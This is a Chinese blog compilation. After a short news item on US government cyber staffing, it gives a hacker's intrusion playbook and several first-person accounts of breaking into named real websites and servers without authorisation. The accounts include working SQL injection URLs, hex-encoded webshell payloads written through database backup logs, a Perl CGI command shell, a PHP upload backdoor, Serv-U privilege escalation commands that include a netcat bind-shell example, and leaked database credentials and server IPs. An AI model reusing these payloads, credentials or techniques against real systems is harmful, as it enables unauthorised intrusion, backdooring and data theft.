Chinadu's Blog

美国一非盈利组织“公共服务伙伴关系”最近发表报告说,美国政府严重缺乏电脑专才,政府机构之间偶尔还会互相竞争,在招聘问题上意见分歧,而且官僚作风又对招聘和挽留人才形成障碍,这使美国在日益猖獗的黑客侵略行动中,处于挨打的状态。据新加坡联合早报报道,报告作者受访时说,这项分析显示,联邦政府没有积极加强电脑专才团,而且其中的协调性也不足,这些问题导致政府无力对付黑客行动。他说,这个报告显示的都是老问题。

政府部门之间在聘请人员的问题上也意见分歧。调查显示,在18个政府内外机构中产生的重重问题,大大阻碍了政府寻找人才填补空缺,更无法成立一个顶尖的电脑专才团。

报告建议联邦政府,必须大刀阔斧进行改革,设法改善政府在招聘、管理和栽培电脑人员问题上的制度。报告也提到,政府应该积极支持和鼓励在职的数理科学生联系,这将增加政府日后的电脑专才人选。

这一年变化比较大，换了好几个工作，最终还是回到了安全的岗位，合乎自己的职业规划！

平时空闲时间经常找些站练练手，基本是新闻闹出轰动的站与一些知名的大站。2008年的成果还是颇丰的，从某某国内2大知名社区论坛到某某著名交友站到某某2大读书站到某某mobile到某某政府站等大站，再到若干名不见经传的小站，都闪过的我的影踪。但我个人觉得没什么好炫耀的，于是没替换首页，没留下黑页，顶多是把源代码打包带回家（硬盘吃不消了，准备买个大的移动硬）。说句老实话，随便替换一个首页，就能让我出名，比如某某禁止降价的房产局站（服务器有黄片），比如某某闹禽流感的政府站，我都提前几天拿下了；不过我不想出名，更不想进局子~

下面谈谈个人入侵的经验，不分语言，只谈拿webshell，至于提权，这里不说，我也很少提权，除非确实有必要！~

1.无论什么站，无论什么语言，我要渗透，第一件事就是扫目录，最好一下扫出个上传点，直接上传shell，诸位不要笑，有时候你花很久搞一个站，最后发现有个现成的上传点，而且很容易猜到，不过这种情况发生在asp居多！

2.asp（aspx）+MSSQL先考虑注入，一般的注入都有DBowner权限可以直接写shell；如果写不了，或者web与数据库分离，那就猜数据，从后台下手了，后台可以上传或者改配置文件；

3.asp（aspx）+ACCESS拿shell一般只有3种方法，一是前台上传或者注入进后台上传；二是注入进后台改配置文件；三是注入进后台备份数据库或者暴库后知道是asp或者asa数据库于是直接写一句话；

4.php+MYSQL一般是注入进后台上传，偶尔运气好些权限够高可以注入select into outfile；然后包含，分本地与远程，远程包含在高版本php是不支持的，于是想办法本地上传图片文件或者写到log里；然后php程序某某未公开的漏洞，运气好可以直接写shell。

5.jsp+MYSQL利用数据库拿权限方面基本同php，而且jsp的上传基本很少检查文件后缀，于是只要有注入点与后台，拿shell相当的容易。jsp+ORACLE的站我碰到的不多，碰到的也是猜出用户名与密码从后台下手的。

6.无论什么大站，主站一般都很安全（不然早被人玩了），于是一般从二级域名下手，猜出主站的某些用户名与密码或者搞到主站的源代码，或者旁注得到同网段服务器后cain或arp。

7.一般的大站很少有用现成的CMS的，于是如果你有幸找到源码，那你就发了，注入漏洞啊，上传漏洞啊，写文件漏洞啊，都掌握在你手里。多看看那些大站新出来的测试分站点，那些站还在测试中，可以很轻松拿下。

8.上传有个文件名截断，这包括2个方面，一是00截断，二是长文件名截断（曾经利用这个搞下hw）；然后很多写文件的地方，都可以00，屡试不爽。上传别忘了.asp（当然.asa，.cer，.cdx都可以啦）目录的妙用。

9.php站无论windows还是linux，都有magic_quotes_gpc的问题，magic_quotes_gpc为on的时候，在server变量注入的时候还是可以select into outfile，今年我搞过某未开源cms就是这个情况，一般情况下为on就别考虑写文件了，不过有这个权限别忘了读文件源码，因为load_file的参数是可以编码的。

10.猜路径或者文件在入侵中非常必要，猜不到路径的时候别忘了google（baidu太烂，google很全），于是你可以考虑看站点下的robot.txt或者robots.txt，会有惊喜。

11.工具的使用很重要，入侵之前用WVS扫扫会有助入侵；注入工具虽然很多，但不见得都好使，现在的软硬防火墙、防注入越来越厉害，那时候你就别偷懒，多手工有助你成长。

12.遇到过一流监控么，遇到其他防post的防火墙么，有时候一句话进去了都无法传大马，那时候，你先学学编码，学学变换绕过。

13.想搞一般的小站，记得查看这个小站的版权，找做这个站的公司，然后从这个公司做的其他站下手，得到源码再回头搞，我曾经通过这个方法拿下某知名制药的公司站。

14.旁注的思路永远不过时，遇到dbowner的注入，可以很舒服写shell到你需要的站，省得麻烦的提权了；运气不好，按部就班拿shell提权得到你所需。

15.永远别忘记社会工程学，利用社工把自己当成一个什么也不会的人，从某某站长的qq，身份证，邮箱等等下手，也许有时可能会有意外；另外别忘记admin,admin；test,test；123456,123456这种简单的尝试，当然，你也可以暴力破解。

16.别忽视XSS，别忽视cookie，XSS可以偷cookie，更有若干妙用，自己学会领悟；cookie可以伪造登陆，cookie可以注入，cookie注入可以绕绝大多数的防火墙。

17.平时搞站多多搜集路径啊，源码啊，工具啊，充实自己的“武器”库；最好把自己的入侵步骤记录下来，或者事后反思下，我一般都是记在txt里，另外要做到举一反三。

18.多学习，多看源码，多看公布出来的0day，脚本是入侵的前提，而不是工具，会用工具会装B你还没入门。

最后奉劝诸位有事没事改人家首页的装B者，出来混，迟早是要还的，别等进了局子再后悔。还有一点，就是我搞N多站，没挂过一个马，至于很多挂马的人，我不知道该说什么，因为大家都喜欢钱，但是还是少为之吧。

今天心头一热，把一些还记得的心得写出来了，希望大家别拍砖，入侵的时候思路是很灵活的，只要不死板，总有一条使自己成功的路。如果大家有什么不解或者疑问需要讨论，欢迎来http://www.oldjun.com讨论或者加我QQ。

还有不要抱着功利心去拿站，做安全的人靠不断拿站提升自己的技术与经验，也可以把自己的产品做的更好；若是急功近利或者为了什么利益，会...哎，不知道该怎么说...世人不知有因果，因果何曾饶过谁！

祝大家元旦快乐！

原文地址：http://www.oldjun.com/blog/index.php/archives/36/

来源：小帅

某天，我和bloodsword大牛在玩，遇到了个mop注射点，起于好奇心的诱惑，溜达之，发现遇到了很多的困难。谁知今天又看到了那个站，于是乎就想写写什么，因为上次遇到的问题真的太多了，写啊写不完。最近五一放假，相对来说有点时间，于是想抄起武器再溜达次，顺便把过程给写写。
首先是一个游戏的站。隶属于mop的，是大话西游的官方地址。上面有许多的下载文件。
如图1

注入点为：http://www.zg.mop.com/service/sales.php?newsId=1178，于是开始注射，我比较喜欢手动的，因为我喜欢看到那个熟悉的MD5页面，于是开始手动注射，
判断长度：http://www.zg.mop.com/service/sales.php?newsId=1178 order by 25/*，
发现返回错误，http://www.zg.mop.com/service/sales.php?newsId=1178 order by 24/*返回正常，那么就是24个长度了，
http://www.zg.mop.com/service/sales.php?newsId=1178 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/*
发现返回如图

于是开始把“12”、“13”2出用列来代替，随便想了个admin表，想了个userid，构造http://www.zg.mop.com/service/sales.php?newsId=1178 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,userid,14,15,16,17,18,19,20,21,22,23,24 from admin/*
结果返回如图

最后猜到了一些信息，发现权限不是root的，也就是一个一般的账号，看来load_file这个路已经没戏了，换路。继续构造：
http://www.zg.mop.com/service/sa ... 0union%20select%201,2,3,4,5,6,7,8,9,10,11,pwd,userid,14,15,16,17,18,19,20,21,22,23,24%20from%20admin/*爆出了个MD5，发现这个MD5无法破解，真郁闷，难道就这么死了？！不行！继续找管理级的账号，
于是用limit，构造语句http://www.zg.mop.com/service/sa ... 0union%20select%201,2,3,4,5,6,7,8,9,10,11,pwd,userid,14,15,16,17,18,19,20,21,22,23,24%20from%20admin limit1,1，读出第2条记录，

于是跑出了账号密码，32位加密的MD5，接着开始找后台，郁闷的是，找后台并不是想的那么简单的！啊D，明小子什么的扫了很久也没扫出什么花样，最后还是bloodsword大牛的注射工具比较强大，字典真厚，扫出了个setup目录，登录一看，吓到我了，原来是织梦的系统……这下，嘿嘿，后台等于拿到手了。如图

就是喜欢看到“Power by DedeCms 织梦内容管理系统”这几个字，于是去down了份织梦的系统，顺利的找到了后台地址，并且登陆，如图

联想网御科技有限公司是在联想控股公司下成立的从事信息安全业务的子公司，是国内信息安全行业的领军企业，专业从事信息安全产品的研发、生产与销售，为用户信息系统提供等级化的整体安全解决方案及专业安全服务。

我曾经在多个政府部门看到他们的防火墙.感觉他挺牛的，可是，事实上，这个所谓的安全公司真的有那么牛吗？正好赶上周末不用上班，对他们的web系统进行了一下测试，结果.....

http://www.infosec365.com.cn/00001/000010006/0000100060002/000010006000200
02/test.txt


好了，废话不多说了。拿起工具，开始我们的入侵吧。

入侵之前我要说一下，对方是安全公司，指不定会给你放个防火墙IDS蜜罐什么的东西。不小心踩中蜜罐或者被IDS记录到，你们可别怪我。
我先看了一下联想的程序，还不错asp.net的。呵呵，不过漏洞没补上，随便点了一个连接。

http://www.infosec365.com.cn/00001/000010006/0000100060002/000010006000200
02/default.aspx?page=1


后边跟了一~号，发现

爆路径了吧。当时我就想，既然我都知道网站路径了，要是有注入而我们的权限又够的话，嘿嘿……

然后我就开始着手寻找注入点。因为我这边的系统有毛病，跑不起啊，那我只好手动找了，找得好辛苦。

http://www.infosec365.com.cn/ViewEbook.aspx?ebookdate=2005-11-
29


找到了这个，自己拿工具跑下就知道是不是注入了。我拿起了NBSI，发现权限是DB_OWNER的，不支持多句。按照小稀当初跟我说的，不支持多句的注入点是不能进行LOG的。没办法，我实在是找不到别的漏洞了，只好试一下了。
看到?是成功备份了，但是没有成功的插入一句话。起先我还以为是不支持多句的缘故，后来看到深白在线，跟他聊了一下，他说DB_OWNER够用了。这句话是我动力的源泉啊，然后发了注入点给他，我们琢磨了好一阵子。通过看联想的错误返回报告才知道，原来是联想过滤了execute 怪不得了，最后我们手动LOG了一个eval端上去。

http://www.infosec365.com.cn/ViewEbook.aspx?ebookdate=2005-11-
29’;create/**/table/**/[dbo].[shit_tmp]/**/([cmd]/**/[image])--


 

http://www.infosec365.com.cn/ViewEbook.aspx?ebookdate=2005-11-
29’;declare/**/@a/**/sysname,@s/**/nvarchar(4000)/**/select/**/@a=db_name
(),@s=0x44003a005c006c007800770079005c004e00650077005c0077006500620073006900740065005c0030
0030003000300031005c003000300030003000310030003000300036005c003000300030003000310030003000
3000360030003000300032005c0030003000300030003100300030003000360030003000300032003000300030
0032005c0031002e00610073007000/**/backup/**/log/**/@a/**/to/**/disk/**/=/**/@s/**/with/**/
init,no_truncate--


 

http://www.infosec365.com.cn/ViewEbook.aspx?ebookdate=2005-11-29’;insert/**/into/**/
[shit_tmp](cmd)/**/values
(0x3c0025006500760061006c00200072006500710075006500730074002800220023002200290025003e00)--


 

http://www.infosec365.com.cn/ViewEbook.aspx?ebookdate=2005-11-
29’;declare/**/@a/**/sysname,@s/**/nvarchar(4000)/**/select/**/@a=db_name
(),@s=0x44003a005c006c007800770079005c004e00650077005c0077006500620073006900740065005c0030
0030003000300031005c003000300030003000310030003000300036005c003000300030003000310030003000
3000360030003000300032005c0030003000300030003100300030003000360030003000300032003000300030
0032005c0031002e006100730070005C007A007A002E00610073007000/**/backup/**/log/**/@a/**/to/**
/disk=@s/**/with/**/init,no_truncate--


 

http://www.infosec365.com.cn/ViewEbook.aspx?ebookdate=2005-11-29’;Drop/**/table/**/
[shit_tmp]--


其中第3部中的values()括号里边的为1句话木马的16进制.大家可以自己转化自己的一句话放里边，这5步下来我们就成功拿到webshell了。因为我是在公司上的，为了不连累公司，我就不做下一步入侵了，给管理员发个信提示一下就可以了。

from:东邪博客

值得一看哦......

以前入侵少之又少，都是研究这样研究那样，实战经验太欠缺了，所以决定暑假恶补一下渗透技术，顺便又可以看看国内主机的安全性。暑假 6 月整整学习了一个月的渗透，从 xiaolu 身上学习到不少好的思路和经验。在此谢谢xiaolu 了。

一个多月的时间里，渗透过上百台服务器，有独立的，有虚拟主机的，有群组的，有国内和国外，我发现一个极其严重的问题，国外的服务器，普遍安全性都非常高，管理员的安全意识非常高，做个比例，如果国内平均每 10 台服务器，能渗透进去 6 台甚至更多，那国外、台湾的，平均每 10 台服务器仅仅能渗透 1 台。当然我的水平也是一个问题。可是却反映出国内的管理员的水平的的确确比国外的要差几个档次。国内的管理员的技术和意识，迫切需要大幅度提高。

不过国内的也有比较 BT 的管理员，我就遇见几个服务器设置得非常。其中一个的 Documents and Settings 目录下还有 nsfocus 目录，难道是 nsfocus 公司帮做的安全？这个服务器我们没有拿下，还有另外一个，就是今天的重点。

一次看见了一个学校论坛（http://www.*****.com），还蛮火爆的，顿时兴趣来了， ping 了一下，发现 4 个包都返回 Request timed out. 估计是搞了策略或者防火墙的，象我这种以 Web 安全的，自然喜欢从站点上找漏洞，自从学习 Web 开始，我就落下一个怪癖，就是如果实在从 Web 上找不到什么漏洞，宁愿放弃也不用什么漏洞扫描器。

大概看了看站点。就是一个论坛，采用 LeadBBS ，拿这个论坛没辙，还有其他办法，因为刚才我访问这个 IP ，返回“No web site is configured at this address.”，初步判断是虚拟主机，前段时间那几个黑站狂黑站的成功几率为什么这么高？因为有 http://whois.webhosting.info 这个网站，可以查询一个 IP 上，绑定了多少个域名。如果真的是虚拟主机，这个学校论坛没有漏洞，不代表其他站点就没有，很快的，我就通过一个小公司站点（ http://anyhost/ ）上的 DVBBS 6.0 传了一个 aspshell 上去，谁知道仅仅能够对自己的目录进行操作。而且自己的目录没有执行程序的权限，又用不了 Nfso ，手工跳转 URL 中的目录，也没有多少个可以浏览的，重要的 Program Files 和 Documents and Settings 目录都看不了，从 aspshell 反馈的信息来看，每个站点都设置了单独的用户，似乎一切都陷入僵局。

没有目的的跳转目录着……

我习惯性的在 URL 跳转到 c:\php，没想到居然可以看见了，那这个主机很可能就会支持 php 了，马上传了一个 phpspy 上去，非常幸运，顺利看到了登陆入口，可是没想到进入以后才发现，php.ini 亦设置得异常 BT，安全模式打开了， phpinfo 函数也被禁用了，看不了详细的系统信息，不过看 phpspy 自带的探针可以发现，allow_url_fopen、display_errors、 register_globals 统统关闭，system、passthru、exec、shell_exec 几个函数都无一幸免的被禁用了，直接跳转目录还是只可以看到这些目录而已，各个站点的目录都是类似于 “D:\websites\school.com#dlfjurdlkfjk” 这样的，每个站点目录后面的那些字符串都不一样，也跳转不到，后来我猜测后面的字符串就是 ftp 密码，试验了一下，无法登陆，看似柳暗花明，希望又破灭了……

结束了吗？不，我试着 FTP 一下：

Microsoft Windows 2000 [Version 5.00.2195]

(C) 版权所有 1985-2000 Microsoft Corp.

C:\Documents and Settings\Administrator>ftp www.*****.com

Connected to www. school.com.

220 Welcome to FTP Server...

User (www.bjtrq.com:(none)):

331 User name okay, need password.

Password:

530 Not logged in.

Login failed.

ftp> bye

221 Goodbye!

从返回的信息判断，我们还是有希望的。尽管他修改了 FTP Server 的 Banner，但是从 User name okay, need password. 这句我们还是大胆的判断这个服务器就是采用 Serv-U ，我上手有目前所有版本 Serv-U 本地提升权限的 Exploit ，如果我能传一个上去，并且能够执行，一切就明朗了。再仔细想想有哪个目录可以写的？当时在 c:\php 目录下没有发现 sessiondata 目录，而且也不是自动安装版，估计管理员把 session 的目录换到其他地方了，不然这个目录是 everyone 可写的……

原来我还忘记了一个最重要的目录， C:\Documents and Settings\All Users ，从这个目录可以知道很多信息，这个目录一般、至少都是 everyone 可读的，这样我们就可以知道好多有用的信息了，直接通过我的 aspshell 手工跳转到这个目录，呵呵。马上看到了想看的目录树。

Application Data

Documents

DRM

Favorites

Templates

「开始」菜单

桌面

马上试试建目录，可惜里面的目录包括子目录都无法新建， BT 管理员权限设置得还真严格，不过我们还是有收获的，那就是 “C:\Documents and Settings\All Users\ 「开始」菜单 \ 程序 \”目录里，看到了很多决定结果的有用信息，

ActiveState ActivePerl 5.8

Administrative Tools

Deerfield.com

DTemp

IPSentry

MBM 5

NetMeter

Network ICE

Persits Software AspEmail

Persits Software AspJpeg

Serv-U FTP Server

Symantec Client Security

Windows 优化大师

WinRAR

启动

管理工具

附件

呵呵，现在我们知道了好多有用的信息了，看着这些东西，可以看得出管理员对安全、效率很在意，装了 Perl，也就是说可能支持 cgi 了， IPSentry 这个可以实时检测网站的各类服务, 当某服务停止时, 该软件会打 Pager, 或 EMAIL,或发声,或运行其它软件来提醒管理员，确保服务器出现问题能及时处理，说明管理员比较负责任，NetMeter 可以对网络流量进行监控，装了黑冰防火墙和诺顿杀毒服务器版，说明管理员对于服务器的安全是很小心的，这还不算，还装了另外一个防火墙—— VisNetic Firewall，真是 BT 到家了，装了优化大师，看得出这个管理员还是比较爱清洁的。从管理工具里面我们还看到了终端服务客户端生成器.lnk 、终端服务配置.lnk ，还有终端服务，这下好了，说不定顺利就可以多一台 3389 肉鸡了。

先通过 aspshell 下载 Serv-U 的任意一个快捷方式，然后本地查看属性的目标，呵呵，原来 Serv-U 的目录是 "C:\Program Filesewfq4qrqtgy4635\Serv-U\" ，这下好了，直接跳转目录。OH～，yes～～，看到了，马上修改 ServUDaemon.ini文件，这个服务器居然放了 280 个用户，狂晕……不管了，先在添加 [Domain1] 里加一行：

User281=angel|1|0

然后加上

[USER=angel|1]

Password=ng98F85379EA68DBF97BAADCA99B69B805

HomeDir=D:\websites

RelPaths=1

TimeOut=600

Maintenance=System

Access1=D:\websites|RWAMELCDP

SKEYValues=

添加一个 angel，密码为 111111 的用户，具有最高权限执行，然后我们就可以 ftp 上去 quote site exec xxxxxxxx 了，嘻嘻偷笑中……

不过残酷现实再一次粉碎了我的计划，修改好文件以后提交，居然是没有修改成功，看来还是权限，权限权限整惨人啊。

不过还是有希望的，因为刚才我们看到了系统装了黑冰，有些版本存在“ISS RealSecure/BlackICE 协议分析模块 SMB 解析堆溢出漏洞”，可以远程利用的，手头上没
有编译器，没有办法编译代码。

还有就是 Perl，这个是个很大的突破口，因为 Perl 目录一般要 erveryone 完全控制的，不管他用 isap 还是 perl.exe 一般都是可写、可执行的，马上下载 Perl 的快捷方式来看看路径，呵呵，看到了，原来 D:\user\bin 就是存放 perl 的 bin 目录下的所有文件，这么说这个目录可能可以写，也可能可以执行咯，马上传一个 su.exe（针对目前所有版本的 Serv-U 本地提升权限漏洞）上去，呵呵，传上去了，太好了，现在就是执行了，刚才我们试了 aspshell、phpshell 都不行，现在就看最后的希望了，找呀找啊，终于在我硬盘上找到一个 cgishell，很老了，文件日期是 2002 年 6 月 30 日的，代码如下：

#!/usr/bin/perl

binmode(STDOUT);

syswrite(STDOUT, "Content-type: text/html\r\n\r\n", 27);

$_ = $ENV{QUERY_STRING};

s/%20/ /ig;

s/%2f/\//ig;

$execthis = $_;

syswrite(STDOUT, "

\r\n", 13); open(STDERR, ">&STDOUT") || die "Can’t redirect STDERR"; system($execthis); syswrite(STDOUT, "\r\n

\r\n", 17);

close(STDERR);

close(STDOUT);

exit;

我用过最好的 cgishell ，保存为一个 cgi 文件执行，晕……居然不支持！一阵阵郁闷袭来，2 秒钟的郁闷后，想到还有一线希望，那就是pl ，我们还没有试试 pl 扩展呢，把刚才的 cgi 文件改为 pl 文件，提交 http://anyhost//cmd.pl?dir ，我的天啊！！

显示“拒绝访问”，终于可以执行了！太兴奋了，马上提交：

http://anyhost//cmd.pl?d:\user\bin\su.exe

返回：

Serv-u >3.x Local Exploit by xiaolu

USAGE: serv-u.exe "command"

Example: serv-u.exe "nc.exe -l -p 99 -e cmd.exe"

嘻嘻～～现在是 IUSR 权限，那又怎么样？看你这次还不死？提交：

http://anyhost//cmd.pl?d:\user\bin\su.exe "cacls.ex ... T /G everyone:F"

http://anyhost//cmd.pl?d:\user\bin\su.exe "cacls.ex ... T /G everyone:F"

http://anyhost//cmd.pl?d:\user\bin\su.exe "cacls.ex ... T /G everyone:F"

http://anyhost//cmd.pl?d:\user\bin\su.exe "cacls.ex ... T /G everyone:F"

返回下面的信息，就表示成功了！！！

Serv-u >3.x Local Exploit by xiaolu

<220 Serv-U FTP Server v5.2 for WinSock ready...

>USER LocalAdministrator

<331 User name okay, need password.

******************************************************

>PASS #l@$ak#.lk;0@P

<230 User logged in, proceed.

******************************************************

>SITE MAINTENANCE

******************************************************

[+] Creating New Domain...

<200-DomainID=2

<220 Domain settings saved

******************************************************

[+] Domain xl:2 Created

[+] Creating Evil User

<200-User=xl

200 User settings saved

******************************************************

[+] Now Exploiting...

>USER xl

<331 User name okay, need password.

******************************************************

>PASS 111111

<230 User logged in, proceed.

******************************************************

[+] Now Executing: cacls.exe c: /E /T /G everyone:F

<220 Domain deleted

******************************************************

每提交完一次都稍微等一下，因为这些命令需要时间处理的，不一会儿，就把所有分区设置为 everyone 完全控制了，可以任意操作硬盘的东西了，但是有些命令还是受了限制，因为权限还没有提升，现在我们把自己的用户提升为管理员：

http://anyhost//cmd.pl?d:\user\bin\su.exe " net l ... s IUSR_anyhost /add"

现在我们通过 web 方式，执行的命令就是以 administrator 的身份执行的了，相信到这里，下面的事该做什么，大家应该知道了吧？马上找到那个学校的目录，进去咯～～目的达到了，本来还想做一个 3389 的肉鸡的，想想算了，这种 BT 管理员的地盘，我也占领不了多久，留点提示到他的桌面就 over 了。

说真的，搞安全这么久，从来没有遇见这么棘手的虚拟主机，要不是装了 Perl，还真是束手无策！本文技术含量不高，只是分享一下希望其中的思路，如果有一个人从中受益，这篇文章就完成它的使命了。

今天没什么事正在几个论坛上闲逛,突然TUPUNCO 发来消息'闪客帝国主站有个地方好像有问题,你看看'，然后直奔http://www.flashempire.com。
测试后发现mysql在4.0已上-支持union，如果利用成功，直接威胁到主机的安全。

入侵步骤 One

首先扫描一下flashempire.com 主机,发现一些常用端口。MySql数据库支持远程连接,整理了一下入侵思路还是重我比较熟悉得 脚本注入 下手吧。首先我们要得到web目录得路径,怎么办呢？就让它出错吧 ^_^ ，当提交一个错误的Query，如果display_errors = on，程序就会暴露WEB目录的绝对路径，只要知道路径，那么对于一个可以注入的PHP程序来说，整个服务器的安全将受到严重的威胁。构造语句是小意思了。
http://www.flashempire.com/theater/top10.php?id=315 就已此为突破口
提交如下信息:
http://www.flashempire.com/theater/top10.php?id='
http://www.flashempire.com/theater/top10.php?id=

返回因为提交数据出错而爆出的路径，如图;

再次思考了下,自己对闪客帝国的网站系统结构一无所知。就将我们的目标定位在MySql数据库，所有当前首要任务是拿到config.php中的数据库帐号 and 密码。由于闪客帝国的主站系统是自己开发的,我们无重得知其文件列表与数据结果。这里我们考虑直接读取文件,就是load_file()，该函数的作用是读入文件，并将文件内容作为一个字符串返回。
当然其也有很多的限制:[php手册中的解释]
1、 欲读取文件必须在服务器上
2、 必须指定文件完整的路径名
3、 必须有权限读取并且文件必须完全可读
4、 欲读取文件必须小于 max_allowed_packet
5、 如果该文件不存在，或因为上面的任一原因而不能被读出，查询返回 NULL

首先提交如下Query:

http://www.flashempire.com/theater/top10.ph ... 01=2%20union%20select%2050,8,7,6,5,4,3,load_file('/home/flash/www/theater/theater.php'),1 


返回出错信息
估计是magic_quotes_gpc = on ,过滤掉了 '号；换种方式再来一次，继续提交[char()函数]
[char()――将提交得字符转换为10进制，也可以使用SQL Encoder.exe转换为16进制得。已适应各种情况]
再次提交使用char()函数的Query:

"char(47,104,111,109,101,47,102,108,97,115,104,47,119,119,119,47,116,104,101,97,116,101,114,47,116,111,112,49,48,46,112,104,112)" 


就是"/home/flash/www/theater/theater.php"的ASCII代码"

http://www.flashempire.com/theater/top10.ph ... 01=2%20union%20select%2050,8,7,6,5,4,3,load_file(char(47,104,111,109,101,47,102,108,97,115,104,47,119,119,119,47,116,104,101,97,116,101,114,47,116,111,112,49,48,46,112,104,112)),1 


成功读出theater.php文件代码
返回成功读出theater.php文件的代码，如图;

根据经验以及文件命名, /include/dbconnect.php就是我们的目标---存放数据库的连接信息的文件。
提交新的Query:

http://www.flashempire.com/theater/top10.ph ... 01=2%20union%20select%2050,8,7,6,5,4,3,load_file(char(47,104,111,109,101,47,102,108,97,115,104,47,119,119,119,47,105,110,99,108,117,100,101,47,100,98,99,111,110,110,101,99,116,46,112,104,112)),1 


成功读出/include/dbconnect.php文件代码
返回成功读出/include/dbconnect.php文件的代码，如下;
$conn = mysql_connect("localhost","root","flash945") or die("数据库连接失败！");

^_^,成功拿到MySql数据库帐号；密码。刚才我们扫描得知MySql允许远程连接;现在我们用PhpMyadmin登陆上看看[phpmyadmin管理mysql个人感觉更方便一些]

打开 本机得 phpmyadmin/config.inc.php 作如下修改

$cfg['Servers'][$i]['host'] = 'localhost' //localhost修改为61.156.17.126[闪客帝国服务器IP] 
$cfg['Servers'][$i]['user'] = 'root'//MySql登陆帐号,不必修改 
$cfg['Servers'][$i]['password'] = '';// MySql登陆密码,修改为flash945 


保存后,浏览我们本机得phpmyadmin即可以管理闪客帝国得MySql数据库.如图;

四处逛逛收集信息,发现很对该网站管理层得帐号密码。本想用社会工程学猜猜密码，单均已失败告终。天津来得朋友又打电话叫去吃火锅，本来想带MM一起去。怕回来太晚就算了。今天的入侵告一段落。

晚上回到寝室一晚上都没睡好，反正整晚都迷迷糊糊的在想如何拿到php shell以及 /etc/password/ 等东西。早上5点就自己醒了,还在回味昨天所想到的入侵思路――――利马跑到机房继续提升权限。

入侵步骤 Two
分析了昨天拿到的数据库
Mysql—MySql数据库的信息
mysql00—估计是MySql数据库备份信息
fe4—主站数据库信息
dhht—论坛信息
blog—管理员的日记信息
a4u—公司商业信息数据
……

思路 1:
首先想到的思路是利用MySQL导出Php Shell，就是利用到手的PhpMyadmin在里面一个数据表中插入Php Shell的内容，然后利用into outfile导出到相应目录，就有了一个后门。在fe4 - fe_faq表 id=16 的位置我们插入Php Shell 代码[angel的小型上传型后门].

<?php 
$msg = copy($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]) ? "上传成功" : "上传失败"; 

echo $msg; 
?> 
<form ENCTYPE="multipart/form-data" ACTION="<?=$PHP_SELF?>" METHOD="POST"> 
<input NAME="MyFile" TYPE="file"> 
<input VALUE="提交" TYPE="submit"> 
</form> 


有了Php Shell代码,下面我们开始into outfile。生成文件的前提是目标文件夹可写!于是我们找到

 
http://www.flashempire.com/school/uploader.php [上传FLASH的区域,对应文件夹应该是可写的]，读取/home/flash/www/school/upload_file.php 


http://www.flashempire.com/theater/top10.ph ... 01=2%20union%20select%2050,8,7,6,5,4,3,load_file(char(47,104,111,109,101,47,102,108,97,115,104,47,119,119,119,47,115,99,104,111,111,108,47,117,112,108,111,97,100,95,102,105,108,101,46,112,104,112)),1 


得到上传FLASH文件的文件夹目录为

$path = "/home/flash/www/download/fla2/"; 
//$path = "D:\\fe4\\upload\\"; 


下面浏览一下我们插入进fe_faq数据库中的Php Shell代码

http://www.flashempire.com/theater/top10.ph ... 01=2%20union%20select%2050,8,7,6,5,4,3,a,1%20from%20fe_faq%20where%20id%20=16 


返回正常,如图:

开始将fe_faq数据库中的内容导出生成Php Shell

http://www.flashempire.com/theater/top10.ph ... 01=2%20union%20select%2050,8,7,6,5,4,3,a,1%20from%20fe_faq%20where%20id%20=16%20into%20outfile%20'/home/flash/www/download/fla2/safer.php' 


试了几次都不行，失败，继续想其他办法。
估计是已下原因:
into oufile一定要引号的,而magic_quotes_gpc = on,过滤掉了我们提交的引号。

思路 2:
由论坛入手上传Php Shell,浏览dhht – setting表,得到论坛得浏览地
址 http://61.156.17.126/dhht/
然后我们注册个帐号 safer/safer ;然后在PhpMyadmin中选择dhht – user数据库并执行" select * FROM `user` where username='safer';"把我得帐号usergroupid修改为6,这样我就成论坛管理员了。
登陆后台 http://61.156.17.126/dhht/admin/ 把论坛常规选项 －附件的有效扩展名 中添加php.然后找个人少的版面上传Php后门。结果又是失败――又到数据库中查看才知道此VBB 2.3.4没有修改过,全部附件数据都在 数据库 中Php后门当然不能执行。。。555 ：（

此时陷入深思中,给angel lanker 发短信。结果angel说跑来上网看看,lanker得陪人。然后又给MM发消息,说好一起吃晚饭。这时我也冷静了下,在等angel的同时继续看闪客帝国,突然发现刚才得数据库中怎么没有闪客帝国本身的论坛数据？！。浏览flashempire.net 闪客帝国论坛。Ping 了下后发现flashempire.com和flashempire.net 是2台服务器。
flashempire.com - - 202.115.129.17
flashempire.net - - 202.115.129.49
用刚才得MySql数据库帐号连接flashempire.net - - 202.115.129.495居然也进去了。又四处乱逛,对闪客帝国论坛flashempire.net也试着上传了下php后门,结果一样――又是失败！既然这里没什么问题，思路混乱中,和angel边聊天边清理思路。最后抱着试试看得心里发据下管理员的blog表,希望在里面发现密码的相关信息。在61.156.17.125-allanblog-AllowedTypes中却以外发现了我梦寐以求的东西！
AllowedTypes:jpg,jpeg,gif,mpg,mpeg,avi,mov,mp3,swf,png
很明显这个blog允许上传影音文件,那么文件夹当然是可写得,我们得PHP后门当然也能传上去。
访问61.156.17.125-allanblog-nucleus_member管理原得密码果然是MD5加密得。还有办法,很快我下载了个同样得BLOG程序并在我电脑上安装成功,设置管理帐号safer/111。

698d51a19d8a121ce581499d7b701668 safer
5dfb3282f16949956bb84731bd4a3884 allan

用PhpMyadmin替换一下顺利登陆,然后上传我们可爱的php shell。终于上传成功,感动哦。马上给lanker报喜 嘻嘻..

然后在服务器里到处逛逛,看看管理员的目录都有那么好东西；看看Apache Ftp的配置文件并下载/etc/passwd 看看。对Linux我不是很熟悉,就此不再继续深入。如果是NT的就可以考虑下抓包等,获取密码信息渗透入公司内网。约了MM吃饭可不能迟到，给闪客帝国得admin 发 gmail 去。哈哈打电话叫 MM 出来一起吃饭庆祝咯！